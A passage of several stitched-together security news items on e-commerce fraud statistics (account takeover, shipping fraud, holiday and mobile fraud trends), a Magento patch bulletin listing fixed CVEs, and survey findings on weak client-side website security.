Shipping fraud is when criminals take over a customer account but don’t change the shipping address in order to avoid detection. Once the package has shipped, they intercept it at the carrier site and change the shipping address.
Besides account takeover and shipping fraud, there were also other significant e-commerce fraud and transaction trends:
- 42% decrease in promotion abuse from 2018 to 2019. Cybercriminals access accounts to drain loyalty points or create multiple new accounts to use the same promotion over and over, often against website and app terms. TransUnion believes this decrease can be attributed to fraudsters turning to more lucrative schemes such as account takeover.
- 78% of all e-commerce transactions came from mobile devices in 2019. That’s a 33% increase from 2018. E-commerce companies are scrambling to ensure a mobile-first experience for consumers not just to browse but to buy.
- 118% increase in risky transactions from mobile devices in 2019. Fraudsters have taken notice that more e-commerce transactions are coming from mobile devices and are trying to replicate that consumer behavior in order to avoid detection.
“Although the death of brick and mortar has been well documented, there is still plenty of room for e-commerce growth with one report claiming online retail only makes up 14% of all global retail sales,” said Gaddis.
“With so much room left for growth, it’s important that retailers stay ahead of the emerging transaction and retail trends to provide a friction-right experience for consumers and a fraudster-proof barrier.”
Online payment fraud attempts increased by 73 percent in 2019, according to a report from Sift.
Additional findings in the report reveal that cybercriminals are using mobile devices more than desktops or laptops to commit payment fraud. In fact, though Windows is the top single operating system for fraudsters, iOS and Android combine to make up more than half of attempted fraudulent transactions.
And while, unsurprisingly, the number one most targeted industry vertical in 2019 was physical e-commerce, business services, digital e-commerce, education, and on-demand services all fell within the top ten fraudiest verticals.
New ways to pay, new ways to steal
The most common payment type associated with fraud? Not credit cards. In fact, credit cards were beaten out by promotions/coupons, cryptocurrency, digital wallets, and even “pay with cash” options that are popular with some on-demand services.
Fraudsters swing for the fences
Rather than trying to avoid detection with smaller purchases, fraudsters look for larger scores, with fraudulent order values reaching three times the price of legitimate purchases on average.
Trying to game the system
The largest attempted purchase on Sift’s platform in 2019 was for a video game power-up sold on an online marketplace. The attempted payment was $1 million, and though obviously fraudulent, demonstrates some of the new methods bad actors are employing in order to steal from businesses.
Summer is the holiday shopping season for fraudsters
Fraudsters don’t wait until the winter holidays to kick their scams into high gear. Rather, payment fraud attempts peak during the summer months.
Working on the weekend
Saturdays had the highest instances of payment fraud attempts of any day of the week.
Adobe-owned Magento has plugged multiple critical vulnerabilities in its eponymous content management system, the most severe of which could be exploited by attackers to achieve arbitrary code execution.
About the fixed vulnerabilities
According to the newest Magento-themed security bulletin (now published as an Adobe security bulletin), three of the six fixed flaws are critical and three are important.
In the “critical” category are a deserialization of untrusted data (CVE-2020-3716) and a security bypass (CVE-2020-3718) that could lead to arbitrary code execution, and an SQL injection (CVE-2020-3719) that could be exploited to leak sensitive information.
In the “important” category are two stored cross-site scripting flaws (CVE-2020-3715, CVE-2020-3758) and a path traversal (CVE-2020-3717) vulnerability, all of which could lead to sensitive information disclosure.
All of these have been patched in:
- Magento Commerce versions 2.3.4 and 2.2.11
- Magento Open Source versions 2.3.4 and 2.2.11
- Magento Enterprise Edition (EE) version 188.8.131.52
- Magento Community Edition (CE) version 184.108.40.206
At the moment, there is no indication that any of these might be actively exploited by attackers. Nevertheless, users/admins are advised to update their installations as soon as possible.
Magento shops are a major target
Magento is one of the most popular open-source e-commerce platforms out there, but web stores running it have unfortunately become a prime – though not exclusive – target for card-skimming cybercriminals (aka Magecart attackers).
Vulnerabilities in the Magento core are just one vector through which attackers can gain access to online shops to insert card-skimming code into them. Other avenues of attack include bugs in popular extensions and plug-ins, phishing emails lobbed at site admins, and compromise of third parties that serve scripts on the target site(s).
There has been a 29% increase in suspected online retail fraud during the start of the 2019 holiday shopping season compared to the same period in 2018, and a 60% increase in suspected e-commerce fraud during the same period from 2017 to 2019, according to iovation.
The findings are based on the online retail transactions analyzed for its e-commerce customers between Thanksgiving and Cyber Monday over the last three years.
“Among the conclusions from TransUnion’s 2019 Holiday Retail Fraud Survey: nearly half of all consumers, 46%, are concerned with being victimized by fraudsters this holiday season with baby boomers being the most concerned of any generation at 54%,” said TransUnion Senior VP of Business Planning and Development, Greg Pierson.
Additional findings: Online retail fraud increase
The percent of suspected fraudulent e-commerce transactions during the start of the holiday shopping season and entire year compared to legitimate transactions for the past three years.
- 15% from Nov. 28 to Dec. 2, 2019. 10% so far in 2019.
- 13% from Nov. 22 to Nov. 26, 2018. 11% all of 2018.
- 11% from Nov. 23 to Nov. 27, 2017. 7% all of 2017.
The top days during the start of the 2019 holiday shopping season for legitimate and suspected fraudulent online retail transactions.
- Thanksgiving, Nov. 28: 16% of legitimate holiday weekend transactions (#5). 17% of suspected fraudulent holiday weekend transactions (#4-tie).
- Black Friday, Nov. 29: 26% of legitimate holiday weekend transactions (#1). 25% of suspected fraudulent holiday weekend transactions (#1).
- Saturday, Nov. 30: 19% of legitimate holiday weekend transactions (#3). 19% of suspected fraudulent holiday weekend transactions (#3).
- Sunday, Dec. 1: 17% of legitimate holiday weekend transactions (#4). 17% of suspected fraudulent holiday weekend transactions (#4-tie).
- Cyber Monday, Dec. 2: 22% of legitimate holiday weekend transactions (#2). 21% of suspected fraudulent holiday weekend transactions (#2).
The countries and U.S. cities where the highest percentage of suspected fraudulent e-commerce transactions originated from during the start of the 2019 holiday shopping season.
- China: 57%
- Central African Republic: 57%
- Lebanon: 45%
- Boardman, Oregon: 70%
- Pineville, Louisiana: 42%
- Alexandria, Louisiana: 38%
Mobile transaction and fraud trends
The survey also found that consumers used a mobile phone or tablet for 63% of their online retail transactions during the start of the 2019 holiday shopping season. That is up from 58% for the same period in 2018 and 56% for the same period in 2017.
For the holiday shopping weekend, retail transactions from a mobile phone compared to all e-commerce transactions were:
- 64% on Thanksgiving, Nov. 28
- 63% on Black Friday, Nov. 29
- 67% on Saturday, Nov. 30
- 66% on Sunday, Dec. 1
- 57% on Cyber Monday, Dec. 2
“Year after year it becomes clear that when not at work, consumers increasingly prefer using their mobile devices to make retail purchases due to their convenience,” said iovation’s Senior Director of Customer Success, Melissa Gaddis. “Once at work when they’re at their desk, consumers turn to their desktop and laptop computers to make purchases.”
Always trying to emulate the purchasing patterns of trusted consumers, mobile is also the preferred method for fraudulent online retail transactions. A mobile phone or tablet appeared to be used for 63% of all suspected fraudulent e-commerce transactions during the long holiday shopping weekend compared to 59% from the same period in 2018 and 51% from the same period in 2017.
A majority of U.S. consumers plan to do most of their holiday shopping online for the first time ever, yet a survey from F-Secure finds that most internet users remain concerned about their exposure to cybercrime. Major consumer trends The survey of shoppers highlighted 3 major trends among American consumers: Bank account hacking and data breaches are the biggest worries on the web. 62% are either worried or extremely worried about a hacker taking over … More
The post As the online shopping season begins, consumers worry about cybercrime appeared first on Help Net Security.
Expect unprecedented levels of online data theft this holiday season due to a lack of deployed client-side security measures.
Disturbing lack of security measures
Tala Security highlights the widespread vulnerability resulting from integrations that enable and enhance website functionality. These integrations, which exist on nearly every modern website operating today, allow attackers to target PII and payment information.
98% of the Alexa 1000 websites were found to be lacking security measures capable of preventing attacks. In related warnings, both the FBI and the PCI Council cautioned that hackers are targeting online credit card information.
“Online merchants and website owners must recognize the critical need for client-side security. The fundamental driver of online commerce — consumer trust — is at stake as attackers target widespread client-side vulnerabilities to steal credentials, credit card numbers, financial data and other PII,” said Aanand Krishnan, CEO and co-founder of Tala Security.
Key findings from the survey
- Only 2% of Alexa 1000 sites have implemented effective controls to prevent personal, financial and credential theft.
- User form data sent, captured on forms available on 98% of websites, is exposed to 10 times more domains than intended by the website owner. This creates a massive opportunity for data theft from attackers.
- The average website relies on 31 third-party integrations, which provide nearly two-thirds of the content customers view on their browsers. This content is delivered via client-side connections that lack effective security controls.
- Most consumers will be surprised to learn that only one-third of the content rendering on their browser is owned, created and served by the owner of the website. The remaining two-thirds is served via client-side connections that lack effective security.
- Although 27% of website owners attempt to deploy security measures, only 2% succeed in deploying effective policies capable of preventing client-side attacks.